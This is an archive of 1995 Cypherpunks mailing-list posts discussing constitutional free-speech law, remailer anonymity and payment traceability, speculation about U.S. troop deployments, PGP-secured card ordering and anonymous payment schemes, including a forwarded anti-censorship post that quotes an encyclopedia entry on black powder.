>>> DNA -- In a bold experiment that provokes investigators to reconsider what
a computer is, a researcher has used the genetic material DNA as a sort of
personal computer.  The experiment's designer, Dr. Leonard Adleman, translated
a difficult math problem into the language of molecular biology and solved it
by carrying out a reaction in one-fiftieth of a teaspoon of solution in a test
tube.  Adleman, of the Univ. of Southern California in Los Angeles, used DNA
to solve a problem that involved finding the shortest path linking seven
cities.  Molecular computers, Adleman said, are fast and efficient, and they
have unheard-of storage capacities.  He said molecular computers can perform
more than a trillion operations per second, which makes them 1,000 times as
fast as the fastest supercomputer.  And they can store information in a
trillionth of the space ordinary computers require.  "It's a very intriguing
idea," said Ron Graham, of the Bell Labs Information Sciences Division at
Murray Hill.  "It's more than just cute.  It makes you think in a different
direction."  (from the Denver Post, Nov. 22, '94)

[...stuff...]
Hmmm. Have you ever been spied on by your own metabolism?
..... YOU WILL.

Then again. maybe not. FYI.

  -Philippe

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxN0uQvlW1K2YdE1AQHMGAQAu5S0T9xUPsdY8SfB0k43bE2BNL5pb1OE
FAg7qjbJ1ugZw0EPDrGFBH7sjq2GHBhyXwgBrlL5j2oAVnnGL2+3QtrcyxIEsrXA
42ME+1JaOQo5+pclCjOrxF00MDoqGdw7hMLexGyawOs7zp+RGDrhPUkMG7ennpky
8QEfrFh8yYU=
=pI4l
-----END PGP SIGNATURE-----
-- 
........................................................................
Philippe D. Nave, Jr.   | Strong Crypto: Don't leave $HOME without it!
nave@abacus.dr.att.com  | 
Denver, Colorado USA    | PGP public key: by arrangement.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 10 Jan 95 23:46:44 PST
To: root@einstein.ssz.com (root)
Subject: Re: Pornography, What is it?
In-Reply-To: <199501110033.SAA00514@einstein.ssz.com>
Message-ID: <199501110734.XAA16586@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


root wrote:

> Also, the 1st Amendment says that Congress shall make no law, it doesn't say
> a damn thing about the states doing it. When I read this amendment what I  see
> is the founding fathers saying it is up to each state to decide for themselves.
> 
...
> The 1st. Amendment says nothing about what the states can do, only Congress.

The Amendment(s) may read "Congress shall make no law...," but the
states are *not* in fact able to pass laws restricting freedom of speech,
establish religions, quarter troops, and so on. Or, rather, they may
go ahead and pass such laws, but the Supreme Court will generally
strike them down as being "unconstitutional."

See how far Utah would get in establishing Mormonism as the official
state religion ("But the Constitution says _Congress_ shall make not
no, and we're not the Congress, so there!").

Deviations exist, of coure. The Second Amendment is in fact routinely
trampled by various states and local jurisdictions, as states ban
various types of guns, etc. There is hope in the gun rights community
that the Supremes will someday deign to hear a case on this and so
strike down these laws which clearly controvert the Constitution.

I'm  not a lawyer, and it's been 25 years since I was in a "civics"
class, so I'm sorry to not recall the precise language by which
"Congress shall make no law" also is taken to apply to Sacramento,
Albany, Austin, and so forth.


--Tim May





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cheap_anonymous@crl.com
Date: Tue, 10 Jan 95 21:39:56 PST
To: cypherpunks@toad.com
Subject: Jay Leno
Message-ID: <199501110448.XAA04663@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tonight on the Tonight Show with Jay Leno, Leno said:

"...why is O.J. writing a book? If he's so eager to tell his experiences, whisper it to Connie Chung."

Thought it might be mildly humerous for those of us who read Tim's message about Connie.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxNjBioZzwIn1bdtAQGEzQF/XkfPjWrW2kbgpYLB6Gf1EiNXEJTwKW1l
mtuAnfhbSHsXPDIvv4IzGoAof2qlsd2v
=66P/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 21:56:58 PST
To: cypherpunks@toad.com
Subject: Re: Why use plastic for remailers and DH?
In-Reply-To: <Pine.3.89.9501102139.A36230-0100000@aix1.uottawa.ca>
Message-ID: <m0rRwAU-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 10 Jan 1995 21:54:24 -0500 (EST)
   From: Angus Patterson <s675570@aix1.uottawa.ca>

   This point may have been raised before, but anyway, unless you're using a 
   swiss-bank issued credit card for a numbered account (if that's at all 
   possible), or a bogus name on the card, why would anybody want to use 
   something as completely traceable as a credit card to pay for a remailer 
   or a data haven?

Because the message you sent into the remailer isn't tracable to the
message that left the remailer (isn't that the point?).  Give the FBI
credit for *some* brains and assume that they already know you used
the remailer, because they saw mail from you enter the remailer.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 22:00:04 PST
To: cypherpunks@toad.com
Subject: Suggestion for remailer operators.
Message-ID: <m0rRwDU-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


If you want to run a remailer fairly safely, insist that all outgoing
mail be encrypted, and put an X bytes/day limit on destinations other
than other remailers.  Why?  Because that way you can't use it to post
to Usenet (other than to annoy people a little with unreadable
postings), and you can't use it to mailbomb someone, and if the
recipient doesn't decrypt the message, there will be no possible
offending content.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Tue, 10 Jan 95 23:12:17 PST
To: root@einstein.ssz.com (root)
Subject: Re: Pornography, What is it?
In-Reply-To: <199501110033.SAA00514@einstein.ssz.com>
Message-ID: <199501110712.BAA22058@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: root <root@einstein.ssz.com>
[...]
> Also, the 1st Amendment says that Congress shall make no law, it doesn't say
> a damn thing about the states doing it.

While in 1850 this might have been the case, you should check some of the
later amendments for and update on what has happened in the last 150 years
of Con Law...

jim



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 10 Jan 95 22:42:03 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [SILLY] Re: Spying via DNA
In-Reply-To: <9501110606.AA21223@abacus.ewindows>
Message-ID: <199501110643.BAA08356@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Philippe Nave writes:
> Hmmm. Have you ever been spied on by your own metabolism?

My metabolism even knows what I ate for breakfast today !!

(sorry, couldn't resist)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 10 Jan 95 22:52:30 PST
To: cypherpunks@toad.com
Subject: Re: Why use plastic for remailers and DH?
Message-ID: <199501110657.BAA06563@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Angus Patterson writes:
> why would anybody want to use something as completely traceable as a 
> credit card to pay for a remailer or a data haven?

Apart from what Russ Nelson observed, safety in numbers is potentially great.
If, say, 15% of the net.populace does it, then it won't be terribly
interesting to know that some particular person has done it. I suppose a
transition period would be helpful, in which credit card-financed bandwidth
is increased with a load of low security traffic.

 -L. Futplex McCarthy


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxOAC2f7YYibNzjpAQHFxAP9EphOcjL96QDuuJQ7eFLv/I3Ci0K6NkMI
tg9bUODYUMVqHs/2dTm8YhxNgOmx90uDb9MPx+EDDrtFZDAT9AIs8GQf1OdsyPrh
Hg9PDIB4jT+JMfY3zqERePW+0Ac5TWoxQto0uQH8lRRWvNcp0R7N/sdYOwIRRTK8
o5BGm0wyJHg=
=qt2F
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxOBOyoZzwIn1bdtAQHAXAF+Jcfrh9xhfx7MlS6oK5Cfu4E96P+rOuGW
Xto/oQG7HcqAbl2adr0zyMQnfh4alDgk
=FtZw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 10 Jan 95 23:09:15 PST
To: root <root@einstein.ssz.com>
Subject: Re: Pornography, What is it?
In-Reply-To: <199501110033.SAA00514@einstein.ssz.com>
Message-ID: <Pine.SOL.3.90.950111015550.18293B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




The 1st says "Congress shall make no law..." and you are right, the
founding fathers meant to leave the states free to do as they pleased.

However, the 14th amendment says "...No state shall make or enforce
any law which shall abridge the privileges or immunities of citizens
of the United States...."  This has been used to enforce Bill of Rights
protections against state laws.

Reading my "Citizens Rule Book," provided by a friend,

Brad D.


On Tue, 10 Jan 1995, root wrote:

> > 
> > You seem to have missed where I say that I don't agree with this
> > line of reasoning. I tend to believe that the first amendment means
> > what it says. (I.e. make no law.) But the fact of the matter is that
> > the people who make the law think differently, right or wrong.
> >
> I understand, I just don't think most of the folks out there against porno 
> are interested in constitutional rights. They don't see them as relevant to 
> their day to day lives. You might call it a sort of cult of personality which
> is using religion as the head.
>  
> Also, the 1st Amendment says that Congress shall make no law, it doesn't say
> a damn thing about the states doing it. When I read this amendment what I  see
> is the founding fathers saying it is up to each state to decide for themselves.
> 
> And since Congress is placed in charge of inter-state relations it is quite
> simple to reduce this to mean that States may not apply their standards to 
> other states because they would then be acting in the place of the federal
> government.
> 
> > >I understand what you are saying, what I am saying is the distinction is not
> > >used in practice. The bbs operator in Cali. that was busted in Tennessee was
> > >busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14
> > >year olds account being operated by a oinkdroid.)
> > The key word here is 'minor'. Minor have nowhere near the rights
> > that adults have. Try banning the sale of pornography to demonstrated
> > adults. 
> >
> Yes, but at no time was it proved that a mindor DID d/l the file only that they
> could. Big distinction to me. A oinkdroid did the d/l'ing by playing like the
> 14 year old. To me this is entrapment.  
> >
>  I think you misunderstand. The First Amendment places restrictions
> > upon what the States may do. The States are free to make such
> > laws or NOT. Some don't. Most do.
> > 
> The 1st. Amendment says nothing about what the states can do, only Congress.
> 
> > It's all very well and good to say such things, but this formulation
> > of liberty has no reasonable basis in Constitutional Law. The
> > Bill of Rights does not encode Mill's On Liberty, as much as you
> > might like it to.
> >
> Then I suggest you read the 9th and 10th Amendment. The 9th says the states
> will ALWAYS get the benefit of the doubt. The 10th says the federal government
> will NEVER get it unless there is a Constitional Amendment.
>  
> > Huh? Obscenity has to do with freedom of speech, not action. It's
> > an exception to the First Amendment, not to some general class
> > of liberties. Depictions of anal sex are typically not considered
> > obscene. The act of anal sex is often made illegal, but that's an
> > entirely separate issue.
> It is made illegal because it is considered obscene. You seem to be skirting
> the issue here. And since when is speech not an act? There are a whole list
> of things included in the freedom of speech issue (ie freedom of the press)
> that clearly implies that speech is one kind of act.
> 
> > 
> > >Also, the whole concept of community standards is unworkable. Whose community?
> > The community passing the law.
> Last time I checked such cases were tried by 12 peers, this hardly qualifies as
> community by any definition. It is not like they take a vote of all the people
> in the community of voting age (which they should).
> > 
> > 
> > Look, you can make general arguments about the way that you think
> > that your liberty should be, but the only legal basis you have
> > for claims that you have the freedom to do something is the
> > Bill of Rights. I'm arguing from that basis.
> >
> As am I. I base each and every one of my beliefs about how this government
> is supposed to be run on that document and that document alone. It is not
> the supreme law of the land for nothing.
> 
> 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Wed, 11 Jan 95 01:11:56 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: Storm Signals
In-Reply-To: <199501110842.DAA07468@bb.hks.net>
Message-ID: <199501110911.DAA05932@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy writes:
> Sam Kaplin writes:
> > Todd Masco writes:
> > > 	1: Somebody's roommate (a Green Beret) has been called back into
> > > 		6 months of active service.  He was not told where he'd be.
> > Perhaps Bosnia?
> 
> I doubt it. [...]
> 
> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.

Military action also requires political will, and with the recent change
in power in the US govt there is no way anything is going to happen for at
least six months.  Freshmen congressmen do not sign off on a war the first
month they get into Washington unless the populace is frothing at the mouth
to kill someone, and that isn't happening.  Clinton does not have the
political pull to get anything related to military action through Congress
at this time, and he can't afford to challenge a legislature he no longer
controls so any call to arms is probably not coming from the Executive
branch.  I also doubt he would be stupid enough to try a "Commander in
Chief" action and hope that the Republicans would forget who scores the
popularity points in such an activity and back him up, the legislature
would crucify him with the electorate for trying move like this.

OTOH, Green Berets are not the kind of troops used for "strike" actions.
Thier primary specialty is low-intensity conflict and working with
indigenous armies.  Given the current geopolitical situation it seems that
Bosnia is the only conflict that the US population cares about at all that
would call for the use of Green Berets.  Then again, maybe the military is
just trying to increase its readiness in the hopes that a Republican
legislature will let them use thier toys again...

jim



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 11 Jan 95 01:59:51 PST
To: "L. McCarthy" <cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501110842.DAA07468@bb.hks.net>
Message-ID: <WHw4lKjqRq69077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501110842.DAA07468@bb.hks.net>, you wrote:
> [BEGIN PGP SIGNED MESSAGE]
> [BEGIN PGP SIGNED MESSAGE]
> Sam Kaplin writes:

> > Perhaps Bosnia?
>
> I doubt it. The only sort of Bosnian engagement that might make sense would
> involve a fairly conspicuous effort with a large number of troops. I can't
> see what a few thousand Green Berets could accomplish there.
>
> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.
>
> Is it time for Bay of Pigs II already ?  ;)

Perhaps it is two unrelated events. Maybe the Russians are using GPS in
their attack on Chechnya, and the administration decided "Not on our dime."

The call up could possibly be related to the repatriacion of the Hatian
boat people or even a continued presence in Hatii. I think Atistede still
needs lots of proping up. The Ton-Ton Macoutes, from Baby Doc and Papa
Doc's dictatorship were the police and military of the previous one. They
just vanished into the population. Its almost the perfect guerilla force,
just the thing the berets are into. This would be much more likely if the
individual was of African decent. From what I have heard, prior to any
military action in Hatii, we had a sizable force of Special Forces, Green
Berets and other elete troops in place. Most of them were black. This was
because they blended in with the populace. Perhaps the forces on the ground
needed to be rotated and personnel came up short. I don't know...but if it
is anything we, should find out real soon.

Manditory crypto thought...I wonder if the government has taken any steps
to prevent the INTERNET from being used for C3 functions, like it was used
during the gulf war by Iraq. (I know...I know...pretty weak, but the
communications has to have been encrypted. :) )

Sam

BTW-You always do this to me Louis...I was just going to go to bed, and
boom I'm up another hour. Grrrrrrrrrrr ;)
- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
    And Lao-tse said: Those who know don't tell; those who tell don't know.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxOqjslnXxBRSgfNAQGcRQf/YGwkpnr/BU9ePaONuGYkCpEwyMun/ymM
nyxLcAH919I55RFUiTUO/5OEeD3bzb/JLR/K6jWIEKKSG4xtu9v6GucDmI7xowZG
h3BRecyT3GQ5I6axo2a9ORdSMRW0A9wvnd3fGlXD5Zt6oJtCP9YikDPH2v2JrkQQ
QwLcLfFbyFzPWu0OIj41sj9kT7V1Kg23ChV7gBjsF1D99cMtBvPmbVRDVb2yGigX
ClKa8NDFPhZVyTxjnoBqLOR1H22iJweUtZ51KkQkjBkgp4OaB7477gwaSC9uzJJG
552OU4KX7NFFpdfl2EmpvfSQMV7W2YUZQqzok6J5Vb5Ll/vYgsJ+5g==
=Whh9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 11 Jan 95 00:29:41 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Pornography, What is it?
In-Reply-To: <199501110734.XAA16586@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.91.950111032338.5716A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Jan 1995, Timothy C. May wrote:

> The Amendment(s) may read "Congress shall make no law...," but the
> states are *not* in fact able to pass laws restricting freedom of speech,
> establish religions, quarter troops, and so on. Or, rather, they may
> go ahead and pass such laws, but the Supreme Court will generally
> strike them down as being "unconstitutional."

The 14th Amendment ensures that states shall not infringe on all 
"privileges and immunities" of citizens of the USA.  The Slaughterhouse 
cases created an interesting judgement that the 14th is not talking about 
all rights of American citizens, but only those coming directly from 
citizenship, thus the Supreme Court must explicitly "incorporate" parts 
of the Bill of Rights via the 14th Amendment to the States.  While 
freedom of speech has been "incorporated," the right to trial by jury has 
not, and neither has the Second Amendment for either individual right to 
keep and bear arms or collective (state government) right to keep and 
bear arms.

It is pretty obvious the 14th was established to limit the ability of 
State's to infringe on the civil rights of blacks.  After reading the 
Slaughterhouse cases, I side with the dissenting Justices and feel that 
it should apply to all rights mentioned in the Constitution.  But that 
isn't the law...

(This is a fairly commong thread on talk.politics.guns)

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 11 Jan 95 00:37:59 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
Message-ID: <199501110842.DAA07468@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Sam Kaplin writes:
> Todd Masco writes:
> > 	1: Somebody's roommate (a Green Beret) has been called back into
> > 		6 months of active service.  He was not told where he'd be.
> 
> Perhaps Bosnia?

I doubt it. The only sort of Bosnian engagement that might make sense would
involve a fairly conspicuous effort with a large number of troops. I can't
see what a few thousand Green Berets could accomplish there.

Frankly, I'm quite puzzled by these signs. I can't think of any country that
seems due for a quick invasion by the USG, but the increase in granularity of
the GPS information suggests an operation of greater magnitude than just a
strike against terrorists, drug cartels etc.

Is it time for Bay of Pigs II already ?  ;)

 -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxOY7Gf7YYibNzjpAQF7nwP+KUk7o1bpM76wmGrzv+KZIgi8kby1XHIj
4FzXLLZGLC8bVGGniv1NkLR76XH6HeLfWpaJu4LeCCBE6RbsgUD+bqEQeTdijpVg
OJzOWM/Rt6/vTJT+/yiVpFBbPDgG1sXvy4SlQX0wSATNzjbdNHxoorory1fOmjRi
6RF2tHYFbTM=
=Yk81
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxOZ9ioZzwIn1bdtAQFF/QGAiqkCeSwdxCMlF0AeO6jOJkaxKQ4EAe68
+AYM/slciv3rbqrkw6nRf19LM7AmXBsG
=lDeV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Parsons <parsons@bga.com>
Date: Wed, 11 Jan 95 05:30:33 PST
To: cypherpunks@toad.com
Subject: Re: CBS/C.Chung Plan Hit Job on Internet? (fwd)
Message-ID: <Pine.3.89.9501110741.A6129-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Tue, 10 Jan 95 21:02:06 PST
From: Greg Bailey <greg@minerva.com>
Subject: Re: CBS/C.Chung Plan Hit Job on Internet?

Non sequitur, I think, Helen.  The above reads like a lame lemma of
the Gun Control theorem and is based on the same fallacious premises.
Information is not intrinsically harmful.  People are.  Information
and other means need not be controlled.  People must control themselves.
If the people in a society cannot control their temptations to do
evil with whatever means are available to them, the society cannot be
called civilized by any reasonable criteria.  Making information
available is not a crime.  Blowing people up is a crime, and those
who do it should pay pay pay.

Any discipline worth studying gives its students the means to do good
as well as evil, and at least in theory the more they know the greater
their potential to act in either direction.

Throughout history damn fools have tried to limit the scope of evil
by limiting information.  All it has demonstrated is that by doing
so one can hamstring constructive activity while accomplishing nearly
zero against evil due to its tenacity.

It is my opinion that the most evil thing anyone can advocate is the
limiting of information, especially since in many cases those who
propose to do the limiting do not even faintly understand the info
themselves.  It is also my opinion that to resist any efforts to
limit availability of information is *not* to bury one's head under
the sand.  Not at all.

All the theory aside, any elementary school kid who pays attention
and knows how to read can easily acquire the art of making gunpowder.
At least this was true in the fifties when I was at that age, and
being boys my friends and I of course spent many a happy hour out
in secluded fields blowing things up in various ways.  This sort
of thing is basic information that anyone brighter than a rock
can come by.

Connie Chung displays an astounding level of ignorance by suggesting
that high technology has much of anything to do with the phenomenon
she reports upon.  Instead she should be asking why kids now feel
they should blow up people and property instead of old castaway
junk.  *That* is the story, not the Internet, not Encyclopaedia
Britannica ... quoting from this year's edition, by the way, from
our kids' book case:

  gunpowder ... The first such mixture was black powder, which consists
  of a mixture of saltpetre (potassium nitrate), sulfur, and charcoal.
  When prepared in roughly the correct proportions (75 percent saltpetre,
  14 percent charcoal, and 11 percent sulfur), it burns rapidly when
  ignited and produces ... Because the burning of black powder is a
  surface phenomenon, a fine granulation burns faster than a coarse
  one ... [more straightforward practical information follows]

I wonder if Connie reads the encyclopedia.
I wonder if she even has one?

Grins...

    Greg Bailey     |  ATHENA Programming, Inc  |  503-621-3215  |
  ----------------  |  24680 NW Dixie Mtn Road  |  fax 621-3954  |
  greg@minerva.com  |  Hillsboro, OR 97124  US  |








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 11 Jan 95 04:40:22 PST
To: cypherpunks@toad.com
Subject: credit card purchases
Message-ID: <v01510101ab397ac7da98@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Saw it there. Thought you might like it here...

Cheers,
Bob Hettinga

>From: peace@BIX.com
>Date: Wed, 11 Jan 1995 00:26:50 -0500 (EST)
>Original-From: peace@BIX.com
>Subject: credit card purchases
>To: www-buyinfo@allegra.att.com
>X-Cosy-To: www-buyinfo@allegra.att.com
>
>                              PGCHARGE
>
>This is a call for interested parties to participate in the alpha
>test of an internet ordering program that will be offered to any
>customer free of charge to create orders that should be
>acceptable to any commercial establishment.
>
>This is a Windows program designed to generate secure charge card
>orders over the internet. The payment mechanism is not the
>critical component for this system, that critical component is
>the use, by the purchaser, of the merchant's public key, for the
>protection of sensitive data, including simple correspondence.
>
>Two paradigms from the commercial word, EDI and email were
>selected for the implementation.  Email operates in a store and
>forward mode that has some security advantages over web or
>network layer security.  That advantage comes directly from the
>fixed nature of the email message itself.  Once it has been
>created and signed by the keyholder, it cannot successfully be
>altered by any other person.  It is also possible for the message
>to be encrypted at the point where it is created.  Hiding the
>contents of the message from anyone other than the intended
>recipient.
>
>EDI has already achieved a great deal of acceptance in the
>commercial world.  This application is a natural use of the
>existing ANSI X12 structures for issuing a purchase order.  Any
>merchant that is currently using X12 structures should be able to
>purchase a single user ViaCrypt PGP license and be in business
>accepting secure credit card orders over the internet.
>
>PGCHARGE does not add any security features by itself, but rather
>facilitates security by building an EDI transaction for a
>recipient selected from a PGP public keyring.  This information
>is then passed to PGP to be secured.  PGCHARGE then waits for PGP
>to complete, adds the appropriate email headers and invokes a
>mailer program.
>
>This program can be downloaded from ftp.csn.org as
>mpj/public/pgcharge.zip.  Comments can be sent to peace@bix.com.
>

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Date: Wed, 11 Jan 95 07:34:33 PST
To: cypherpunks@toad.com
Subject: MBONE broadcasts next week
Message-ID: <199501111534.IAA23174@atd.atd.ucar.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The USENIX folks plan to broadcast (well..err...multicast) a number of
talks from next week's conference over the MBONE.  Details are still
unavailable, but Evi has posted the following interesting list of folks:

----
Wednesday, January 18:
Bruce Schneier, Counterpane Systems	    Cryptography
Brad Chen, Harvard Univ			    Operating System Measurement

Thursday, January 19:
John Ousterhout, Sun Microsystems	    TCL for Internet Agents
Bill Janssen, Xerox PARC		    ILU/CORBA Inter-Language
					    Unification
Nathaniel Borenstein, 1st Virtual Holdings  Internet Information Commerce
David Chaum, Digicash b.v.		    Cash on the Internet

Friday, January 20:
Hal Varian, Univ of Michigan		    Economics of the Internet
Pavel Curtis, Xerox PARC		    The Internet at the Turn of the 
					      Millennium: How You'll Use It
					      and Who You'll Meet There
----

The keynote will be Mark Weiser of Xerox PARC talking about their
"ubiquitious computing" scheme, which has its own set of privacy
implications...

Details as I get them.

jon

Jonathan Corbet
National Center for Atmospheric Research, Atmospheric Technology Division
corbet@stout.atd.ucar.edu	     http://www.atd.ucar.edu/rdp/jmc.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 11 Jan 95 10:00:33 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: Storm Signals
In-Reply-To: <199501110842.DAA07468@bb.hks.net>
Message-ID: <199501111759.JAA18260@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:
> Sam Kaplin writes:
> > Todd Masco writes:
> > > 	1: Somebody's roommate (a Green Beret) has been called back into
> > > 		6 months of active service.  He was not told where he'd be.
> > 
> > Perhaps Bosnia?
> 
> I doubt it. The only sort of Bosnian engagement that might make sense would
> involve a fairly conspicuous effort with a large number of troops. I can't
> see what a few thousand Green Berets could accomplish there.
> 
> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.

CNN reported on Monday that U.S. troops are being sent back to Somalia
to ensure and orderly and safe withdrawal of U.N. peacekeeping forces.

This might explain the few thousand Green Berets being sent, if this
is so. About the GPS, I have nok idea, though it seems plausible.

I know this has no Cypherpunks relevance, but I see a lot of
speculation, so I thought adding what CNN is reporting might help.

--Tim

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 11 Jan 95 08:43:59 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <Yr94lKjqRqWD075yn@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950111114155.10307B-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Jan 1995, Samuel Kaplin wrote:

> Date: Sun, 08 Jan 1995 20:20:18 -0600
> From: Samuel Kaplin <skaplin@mirage.skypoint.com>
> To: Eric Hughes <eric@remailer.net>, cypherpunks@toad.com
> Subject: Re: Anonymous payment scheme
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <199501021344.FAA11566@largo.remailer.net>, you wrote:
> >    From: skaplin@skypoint.com (Samuel Kaplin)
> >
> >    I was looking at at the bigger picture. Any merchant who accepts Visa or MC
> >    could now accept anonymous payments. No hassle at all on their part.
> >    [...]
> >    The key
> >    would be not to have the card attached to the account. If the card is
> >    attached to any type of account, then there are reporting requirements.
> >
> > Visa was talking about an electronic traveller's check, which, from
> > what I could tell, instantiated an account in the sum of the value of
> > the card purchased, which was then drawn down by purchase.  The card,
> > evidently, had no embossing on it.  Personalization was limited to
